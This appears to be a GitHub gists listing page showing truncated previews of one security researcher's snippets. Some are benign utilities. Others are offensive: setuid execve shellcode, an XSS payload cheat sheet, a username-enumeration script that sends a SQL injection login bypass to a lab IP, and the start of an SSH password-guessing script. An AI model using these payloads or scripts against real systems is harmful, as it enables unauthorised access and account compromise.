Skip to content

Instantly share code, notes, and snippets.

View tcp-proxy.sh
#!/bin/sh -e
if [ $# != 3 ]
then
echo "usage: $0 <src-port> <dst-host> <dst-port>"
exit 0
fi
TMP=`mktemp -d`
BACK=$TMP/pipe.back
View 99_bottles_of_beer_on_the_wall.asm
global _start
section .text
_start:
xor ecx, ecx
mov cl, 0x63
song:
mov eax, ecx
call convert_to_ascii
@rastating
rastating / setuid_execve_shell.c
Last active Aug 23, 2018
Linux i686 setuid(0) execve shell (30 bytes)
View setuid_execve_shell.c
/*
Title : Linux i686 setuid(0) execve shell (30 bytes)
Author : rastating
08048060 <_start>:
8048060: 31 db xor %ebx,%ebx
8048062: 8d 43 17 lea 0x17(%ebx),%eax
8048065: cd 80 int $0x80
8048067: 31 c9 xor %ecx,%ecx
8048069: 31 d2 xor %edx,%edx
View yardoc_cheatsheet.md

YARD CHEATSHEET http://yardoc.org

cribbed from http://pastebin.com/xgzeAmBn

Templates to remind you of the options and formatting for the different types of objects you might want to document using YARD.

Modules

# Namespace for classes and modules that handle serving documentation over HTTP
@rastating
rastating / xss_vectors.txt
Created Apr 24, 2018 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
View xss_vectors.txt
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@rastating
rastating / monzo_to_qbo.py
Last active Dec 29, 2017
A Python script to convert the dates in CSV exports from the Monzo mobile application into a format supported by QuickBooks Online. Requires the pandas package, which can be installed via pip.
View monzo_to_qbo.py
from dateutil.parser import parse
import pandas as pd
import csv
import sys
if len(sys.argv) == 1:
print "Usage: monzo_to_qbo.py [path to Monzo csv export]"
exit(1)
RED = "\033[1;31m"
View opendocman_database.sql
# MySQL dump of OpenDocMan
#
#--------------------------------------------------------
#
# Table structure for table 'odm_access_log'
#
CREATE TABLE `odm_access_log` (
`file_id` int(11) NOT NULL,
View user_enum.py
import requests
import sys
with open(sys.argv[1], 'r') as f:
for line in f:
sys.stdout.write("Trying username: %s \r" % line.strip())
sys.stdout.flush()
r = requests.post("http://10.2.0.104/checklogin.php", data={ 'myusername' : line.strip(), 'mypassword' : "'or'a'='a", 'Submit' : 'Login' }, allow_redirects=True)
if r.text.find("Oups, something went wrong") == -1:
print "++ Found user %s ++" % line.strip()
@rastating
rastating / sha1check.sh
Created Jul 23, 2017
Helper script for validating files against SHA1 checksums
View sha1check.sh
#!/bin/bash
if [ "$#" -ne 2 ]
then
echo "Usage: sha1check [filename] [checksum]"
exit 1
fi
echo "$2 *$1" | sha1sum -c -
@rastating
rastating / getsshpass_ipv6.sh
Created Jun 14, 2017
A modified version of the getsshpass.sh script which uses IPv6 instead of IPv4.
View getsshpass_ipv6.sh
#!/bin/bash
#
# sshpass return values:
# 0 - password OK
# 3 - general runtime error
# 5 - bad password
# 255 - connection refused
declare -r START_TIME=$(date +%s.%N) # Start time of the program
You can’t perform that action at this time.